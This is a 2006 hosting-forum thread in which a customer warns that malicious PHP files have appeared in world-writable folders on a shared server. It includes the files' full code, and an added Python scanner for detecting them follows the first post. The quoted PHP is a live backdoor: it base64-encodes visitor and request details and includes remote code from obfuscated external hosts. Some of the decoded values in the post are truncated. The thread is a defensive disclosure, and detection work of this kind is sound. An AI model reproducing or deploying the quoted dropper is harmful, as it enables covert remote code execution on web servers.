Old May 16th, 2006, 10:58 AM   #1 (permalink)
Registered User
Seasoned Poster
 
Joined in Apr 2004
Lives in edmonton, ab
Hosted on pass5
84 posts
Gave thanks: 0
Thanked 0 times
Server exploit -- Pass 40

Hello,

I already submitted this to Surpass security.

There is a major problem with server security. All folders with write permissions (777) have malicious PHP code in them.

Usually they are called contact.php, download.php and others.

It consists of this code:

<?
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}
?>

The base64-encoded values are as follows:

"aHR0cDovLw==" is "http://"
"dXNlcjUucGhwc3VwcG9ydC5ydQ
"dXNlcjUucGhwc3VwcG9ydC5ydQ

Those files are in EVERY folder with 777 permission.

You can read about it in-depth here:
http://forums.asmallorange.com/lofiv...php/t5815.html

This DOES affect Surpass accounts.

Check your folders!!


vexcity.com
pass40

Last edited by clayhenry; May 16th, 2006 at 10:59 AM..
clayhenry is offline  
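A defensive sweep for the pattern described in the post above, as an added example that is not part of the original thread: it looks only in world-writable directories, flags PHP files that include() a base64_decode()'d string, and decodes the literals so the remote host is readable. The directory names and the host loader.example.invalid are constructed for the demo.

```python
import base64, os, re, stat, tempfile

# include(base64_decode("...")...) is the signature of the file quoted above.
INCLUDE_RE = re.compile(r'include\s*\(\s*base64_decode\s*\(', re.I)
B64_LITERAL_RE = re.compile(r'base64_decode\s*\(\s*"([A-Za-z0-9+/=]+)"')

def decode_literals(source):
    """Decode every string literal passed directly to base64_decode()."""
    out = []
    for lit in B64_LITERAL_RE.findall(source):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:  # truncated or malformed literal
            out.append("<undecodable:%s>" % lit)
    return out

def scan(root):
    """Return (path, decoded literals) for suspect PHP files in o+w directories."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if not os.stat(dirpath).st_mode & stat.S_IWOTH:
            continue  # the report concerns 777-style directories only
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", errors="replace") as fh:
                src = fh.read()
            if INCLUDE_RE.search(src):
                findings.append((full, decode_literals(src)))
    return findings

def demo():
    """Build a constructed sample tree (one 777 dir, one 755 dir) and scan it."""
    host = base64.b64encode(b"loader.example.invalid").decode()  # constructed host
    dropper = ('<? $str="x"; if ((include(base64_decode("aHR0cDovLw==")'
               '.base64_decode("%s")."/?".$str))){} ?>' % host)
    with tempfile.TemporaryDirectory() as root:
        for sub, mode in (("uploads", 0o777), ("lib", 0o755)):
            d = os.path.join(root, sub)
            os.mkdir(d)
            with open(os.path.join(d, "contact.php"), "w") as fh:
                fh.write(dropper)
            os.chmod(d, mode)  # explicit chmod: mkdir's mode is subject to umask
        return [(os.path.relpath(p, root), urls) for p, urls in scan(root)]

if __name__ == "__main__":
    print(demo())
```

Point scan() at an account's document root; a hit in a directory that does not need to be world-writable is also a cue to tighten that directory's mode.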
Old May 16th, 2006, 4:24 PM   #2 (permalink)
is surrounded by retards.
Resident.
 
David's Avatar
 
Joined in Mar 2004
Lives in fear of Obama.
Hosted on Pass 7
13,082 posts
Gave thanks: 8
Thanked 33 times
You should calm down. Just because this was on your site doesn't mean that ALL SERVERS AND FOLDERS WITH 777 have been affected. If a newer user looks and it's not there, they may freak out because they don't see it and think something worse is going on. Mass panicking everyone because this showed up on your site isn't a good idea. In fact, it's more likely that your site had insecurities in it to allow this, or the server you are on only had an insecurity in one of the sites it's hosting which allowed this. This does not mean the whole data center is compromised or broken.

After reading that link, I didn't see anything in there saying that there was a hole in the server, but several saying it was likely the software...including the first post.
__________________
David is offline  
Old May 16th, 2006, 5:13 PM   #3 (permalink)
Registered User
Seasoned Poster
 
Joined in Apr 2004
Lives in edmonton, ab
Hosted on pass5
84 posts
Gave thanks: 0
Thanked 0 times
Please tell me where I mentioned "ALL SERVERS AND FOLDERS "?

I don’t see myself mentioning ALL SERVERS AND FOLDERS.

This is in regards to PASS40.

What I meant was, if one folder is affected, all of them will be affected with that permission.
There are common scripts that require that permission.

Next time, I will definitely think twice before posting a warning that will affect users.

You’re right; ignorance is bliss...carry on.

Last edited by clayhenry; May 16th, 2006 at 5:23 PM..
clayhenry is offline  
Old May 16th, 2006, 5:23 PM   #4 (permalink)
Marketing Maven
Surpass Staff
 
Kayla's Avatar
 
Joined in May 2003
Lives in Orlando
24,749 posts
Gave thanks: 946
Thanked 806 times
Clay,

Soon Pass40 will have phpsuexec, as newer servers do.
Kayla is offline  
Old May 16th, 2006, 6:16 PM   #5 (permalink)
Rai
Senior Member
Super #1
 
Rai's Avatar
 
Joined in Nov 2003
Lives in Canada
Hosted on Pass14
3,770 posts
Gave thanks: 4
Thanked 20 times
Quote:
Originally Posted by clayhenry
Please tell me where I mentioned "ALL SERVERS AND FOLDERS "?

I don’t see myself mentioning ALL SERVERS AND FOLDERS.

This is in regards to PASS40.

What I meant was, if one folder is affected, all of them will be affected with that permission.
There are common scripts that require that permission.

Next time, I will definitely think twice before posting a warning that will affect users.

You’re right; ignorance is bliss...carry on.
We appreciate you offering a warning to all users, but next time ensure that you clearly specify what server you are talking about (preferably in the title of the post), since there are more than a few at Surpass. If I were to guess, I'd think you were talking about Pass5, since that's the server you have listed in your profile... I completely missed your reference to Pass40 in your first post. Just be clear so that people can't misinterpret what you're trying to say.

I can't wait for phpsuexec to finally get around to all servers... though, I'll admit, I only started actually understanding it about 2 nights ago.
__________________
Rai is offline  
Old May 16th, 2006, 6:26 PM   #6 (permalink)
Registered User
Seasoned Poster
 
Joined in Apr 2004
Lives in edmonton, ab
Hosted on pass5
84 posts
Gave thanks: 0
Thanked 0 times
My apologies, I do realize that I failed to emphasize what server I was on and was speaking of.
The title should have been a good place to put it.

This is the first time I hear of this phpsuexec.

Last edited by clayhenry; May 16th, 2006 at 6:27 PM..
clayhenry is offline  
Old May 16th, 2006, 6:27 PM   #7 (permalink)
Yabadabadoo
Super #1
 
Geoff's Avatar
 
Joined in Nov 2004
Lives in B.C., Canada
Hosted on Dedicated
1,013 posts
Gave thanks: 7
Thanked 28 times
Quote:
Originally Posted by clayhenry
Please tell me where I mentioned "ALL SERVERS AND FOLDERS "?

I don’t see myself mentioning ALL SERVERS AND FOLDERS.
Not to be picky, but anyone reading your first post will get the impression that you did say that. For one, you explicitly stated ALL FOLDERS, and then said it affects Surpass accounts, which doesn't restrict your statement to just one server; it implies many, or most, or all, are "affected".

Quote:
All folders with write permissions (777) have malicious PHP code in them.
Quote:
This DOES affect Surpass accounts.
__________________
Geoff Ellis - Surpass Dedicated Server Customer
www.adepttechs.net
Geoff is offline  
Old May 16th, 2006, 6:43 PM   #8 (permalink)
Registered User
Seasoned Poster
 
Joined in Apr 2004
Lives in edmonton, ab
Hosted on pass5
84 posts
Gave thanks: 0
Thanked 0 times
It's interesting how people on this forum choose to criticize how the message was formulated rather than what it carries.

Yes, it does affect all folders on the affected account.

Yes, it does affect Surpass accounts. It affected most of mine, and it's not due to my error. Some scripts require 777 in order to function.

But please, go ahead, pick apart what I say.

It's funny how my first thought of warning other users has been thrown back in my face.

I will definitely keep that kind of stuff to myself. Lesson learned.

My apologies if I have thrown you into panic.

Last edited by clayhenry; May 16th, 2006 at 6:49 PM..
clayhenry is offline  
Old May 16th, 2006, 6:52 PM   #9 (permalink)
Yabadabadoo
Super #1
 
Geoff's Avatar
 
Joined in Nov 2004
Lives in B.C., Canada
Hosted on Dedicated
1,013 posts
Gave thanks: 7
Thanked 28 times
lol I'm not the least bit worried about this "problem"

But what I have a problem with is you stating something, and then denying it in the exact same thread. You stated it, and then when someone asks you not to get people worried by telling them they are all vulnerable, you deny saying it. Yet it's in writing at the top of the thread.
__________________
Geoff Ellis - Surpass Dedicated Server Customer
www.adepttechs.net
Geoff is offline  